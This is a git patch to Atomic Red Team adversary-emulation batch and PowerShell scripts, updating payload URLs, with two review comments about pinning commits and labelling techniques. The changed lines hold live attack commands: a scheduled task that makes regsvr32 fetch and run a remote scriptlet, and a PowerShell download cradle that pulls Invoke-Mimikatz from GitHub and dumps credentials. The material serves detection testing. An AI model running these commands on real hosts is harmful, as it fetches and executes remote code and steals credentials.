From 818c2ce55dd4ebd43b2f3b47581acf10d502d13a Mon Sep 17 00:00:00 2001
From: Michael Haag
Date: Thu, 14 Feb 2019 14:43:31 -0700
Subject: [PATCH] DragonsTail (#458) Updated URLs to fix #437
---
 ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat | 4 ++--
 ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
index 6e710763..d1596491 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
@@ -9,7 +9,7 @@ :: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 :: Create Scheduled Task With RegSv32 Payload
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
 SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 :: Tactics: Execution
 :: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 :: Tactics: Defense Evasion
 :: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
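Review bot: The comment above the changed `SCHTASKS /Create` line in the `@@ -9,7 +9,7 @@` hunk of chain_reaction_DragonsTail.bat still cites only T1053, while the new URL path (`atomics/T1117/RegSvr32.sct`) shows that the task's action belongs to T1117. A comment line such as `:: Technique: Regsvr32 (T1117), launched by the scheduled task` would tell whoever validates detections to expect both a task-creation event and a regsvr32.exe process with a remote `/i:` URL. The matching hunk in chain_reaction_DragonsTail.ps1 has the same gap, with `#` as the comment marker.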
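Review bot: The new Invoke-Mimikatz URL in the `@@ -18,7 +18,7 @@` hunk points at the `dev` branch of a third-party repository, so `IEX` runs whatever that branch tip holds at test time, whereas the RegSvr32.sct URL changed in this same commit is pinned to commit 6965fc15ef872281346d99d5eea952907167dec3. A branch ref can move or vanish, which would either break the test again or execute unreviewed script content on the test host. Pin this URL to a reviewed commit too, i.e. replace `/Empire/dev/` with `/Empire/<REVIEWED_COMMIT_SHA>/`. The identical line in chain_reaction_DragonsTail.ps1 needs the same change.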
diff --git a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1 b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
index 849359a6..f6a11ec9 100644
--- a/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+++ b/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
@@ -9,7 +9,7 @@ # Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
 # Create Scheduled Task With RegSv32 Payload
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
+SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
 SCHTASKS /Run /TN "Atomic Testing"
@@ -18,7 +18,7 @@ SCHTASKS /Delete /TN "Atomic Testing" /F
 # Tactics: Execution
 # Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
 # Tactics: Defense Evasion
 # Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099